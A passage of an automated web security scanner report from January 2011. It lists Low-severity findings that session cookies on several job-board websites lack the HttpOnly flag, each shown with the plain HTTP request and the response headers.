Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:16 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116111

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.60. http://www.execcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.execcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.execcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:21 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=sedi04t58r2ut89pg242blpvl1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130348

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.61. http://www.facilitiescrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.facilitiescrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facilitiescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:50 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=nc6a2h1em6s3batcv6fjsg17b1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:50 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117478

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.62. http://www.financialservicescrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.financialservicescrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.financialservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:51 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qsnigj0dejirrlqc4mq67l7kd4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117666

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.63. http://www.foodservicescrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foodservicescrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.foodservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=eh1vjkcudnunpfbo2nu0rbgdm5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 110006

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.64. http://www.fundraisingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fundraisingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.fundraisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:23 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=8b0film2tj8qfoehbgchdt1as6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 97962

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.65. http://www.giscrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.giscrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.giscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:26 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0a97dse4dq233td161telhv1q5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:26 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109314

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.66. http://www.governmentcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.governmentcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.governmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:48 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ipjkgrjvb62q6cj7quksggdq0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:48 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117229

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.67. http://www.graduateschoolloans.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.graduateschoolloans.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.graduateschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:56 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=pv00mgmh60i7tksicjfc8juuq5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92867

<script type="text/javascript" src="http://www.graduateschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.graduateschoolloans.com/script/overlibmws_scroll.j
...[SNIP]...

10.68. http://www.healthcarecrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.healthcarecrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.healthcarecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:59 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pv7nj7m5sv3h8sbbsgp6rc6ju4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 140242

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.69. http://www.helpdeskcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.helpdeskcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.helpdeskcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:06 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=20p261b30i1nrgola0d06ago67; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108384

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.70. http://www.hospitalitycrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hospitalitycrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hospitalitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=q8m0d2m0af2bg06uti2kh5prd0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 129154

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.71. http://www.hound.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hound.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=125x125\ HTTP/1.1
Host: www.hound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=a827dr0sigiku3i02l6760rfb1; path=/; domain=hound.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: country=United+States; expires=Sun, 20-Feb-2011 19:34:57 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 121008


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>The Largest Online Job Search Engine | Jobs from Employers | Hound.com</ti
...[SNIP]...

10.72. http://www.hound.com/gjsearchresult.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hound.com
Path:   /gjsearchresult.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gjsearchresult.php HTTP/1.1
Host: www.hound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 21 Jan 2011 19:34:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=d9q7enc1nis5276b2qurtlt332; path=/; domain=hound.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: gjsearch.php?q=&l=
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



10.73. http://www.hrcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hrcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hrcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=p4a701ljjtkci3m6f866chs876; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116534

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.74. http://www.hvaccrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hvaccrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hvaccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pber3q1f9cj4n51gq3upv43jp0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:32 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112628

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.75. http://www.informationtechnologycrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.informationtechnologycrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.informationtechnologycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:43 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=k1m7ouon0b4rcae41h2bgg8ig6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:43 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133954

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.76. http://www.insurcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.insurcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.insurcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
